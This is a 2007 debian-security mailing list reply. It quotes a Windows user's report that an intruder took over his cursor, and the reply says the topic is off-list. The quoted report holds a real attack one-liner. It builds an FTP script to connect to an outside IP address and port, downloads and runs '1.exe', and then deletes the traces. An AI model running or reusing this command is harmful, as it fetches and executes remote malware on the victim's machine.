Re: spooky windows script

To: debian-security@lists.debian.org
Subject: Re: spooky windows script
From: David Clymer <david@hrcsb.org>
Date: Tue, 08 May 2007 10:14:40 -0400
Message-id: <1178633680.13092.38.camel@localhost.localdomain>
In-reply-to: <3246512.31471178629044474.JavaMail.www@wwinf6103>
References: <3246512.31471178629044474.JavaMail.www@wwinf6103>

On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:
> Hello,
> 
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> 
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> 
> (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> 
> After that all is back to normal.
> 
> Now this is of course a nuisance, but is it also a thread? And what can be done against it?
> 
> Anybody got a clue on this?
> 

I'm sure someone has a clue. However, clued listmembers or not, a
windows security issue is not an appropriate topic for discussion on a
mailing list called "debian-security". As the name implies, this list is
for discussing security issues as they relate to the Debian GNU/Linux
distribution.

-davidc

--
A good hot dog feeds the hand that bites it.

Reply to:

References:
- spooky windows script
  - From: Jan Outhuis <jan.outhuis@orange.nl>

Prev by Date: Re: spooky windows script
Next by Date: Re: spooky windows script
Previous by thread: Re: spooky windows script
Next by thread: Re: spooky windows script
Index(es):
- Date
- Thread